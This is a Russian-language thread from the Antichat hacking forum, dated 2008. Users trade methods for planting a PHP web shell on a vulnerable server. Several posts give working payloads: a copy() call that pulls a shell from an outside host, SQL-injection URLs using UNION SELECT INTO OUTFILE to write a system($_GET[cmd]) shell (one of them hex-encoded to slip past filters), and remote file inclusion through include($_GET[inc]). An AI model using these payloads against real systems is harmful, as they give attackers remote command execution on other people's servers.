08.01.2008, 21:23
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
Spyder
это не всегда удобно так как пост запросы сразу отпадают, а соответственно и заливка файлов на сервер
2Basurman
а ты знаешь что к таблице mysql.user вобще обычно доступ закрыт?
Последний раз редактировалось Termin@L; 08.01.2008 в 21:25..
|
|
|
08.01.2008, 21:27
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
1) Ой, только не надо поучать Spyder-a
2) ty13r задал вопрос, на который надо отвечать,
а не оффтопить...
|
|
|
|
08.01.2008, 21:33
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
<? copy("http://sait.narod.ru/shell.php","./shellcheg.php"); ?>
это лучше захексить
запускаешь скрипт шелл копируется из указанного пути (http://sait.narod.ru/shell.php) в папку со скриптом подименем shellcheg.php
__________________
Карфаген должен быть разрушен...
|
|
|
|
08.01.2008, 21:34
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
Нет вы извините конечно за оффтоп, но кто такой Spyder, чтобы ему уже нечему было учиться????
Evil вот и не оффтопь, раз такой умный
Scipio
зачётный способ как-то не догадался)))
Последний раз редактировалось Termin@L; 08.01.2008 в 21:36..
|
|
|
|
08.01.2008, 21:40
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
С нами:
9865044
Репутация:
205
|
|
Посмотри на свою репу, и на репу Spyder-a... А что касается поставленного вопроса: проинклудь шелл и все.
|
|
|
|
08.01.2008, 21:42
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
если уж на то пошло, то
http://site.com/bug.php?&id=-1'+union+select+'<?system($_GET[cmd]);?>',2+into+outfile+'/www/site/shell.php'/*
то есть не пользуйся пробелами в <?system($_GET[cmd]);?> .. далее, можешь внутри система заинеодить в бэйс. у меня много раз не пропускало именно изза $
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Последний раз редактировалось blackybr; 08.01.2008 в 21:58..
|
|
|
|
08.01.2008, 21:43
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Такс, давай те по порядку, а то я щас с ума сойду
ТС говорит что файл создаётся (!!!), т е права на создание файлов есть, из этого следует вопрос нахуя нужен вот этот пост ------> https://forum.antichat.ru/showpost.php?p=553675&postcount=6 ?????
далее
Spyder
это не всегда удобно так как пост запросы сразу отпадают, а соответственно и заливка файлов на сервер
это кто тебе такую чушь сказал? тебя обманули жестоко
Ты хочешь скать есть выполнить код <?include($_GET[inc])?>
и проинклудить удалённый шелл который работает постом и естественно файлы льются тоже с использованием метода пост, то работат ничего не будет? Ты серьёзно так думаешь?
blackybr: в случае allow_url_fopen будут 
Блеки, вообще то
http://site.com/bug.php?&id=-1'+union+select+'<?system($_GET[cmd]);?>',2+into+outfile+'/www/site/shell.php'/*
<?system($_GET[cmd]);?> - надо в кавычки обрамлять
blackybr: Извини ламера  DDDD
хватет мои посты редактировать
blackybr: старею )
Последний раз редактировалось blackybr; 08.01.2008 в 21:59..
|
|
|
|
08.01.2008, 21:50
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
тогда уж
http://site.com/bug.php?&id=-1'+union+select+0x3C3F73797374656D28245F4745545B22 636D64225D293B3F3E,2+into+outfile+'/www/site/shell.php'/*
а вобще думаю мой вариант наиболее оптимальный (хотя как пхп настроен)
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Заливка шелла в Joomla
|
AkyHa_MaTaTa |
Веб-уязвимости |
75 |
02.09.2013 06:53 |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
Что такое Php?
|
PAPA212 |
Болталка |
13 |
28.12.2007 20:44 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
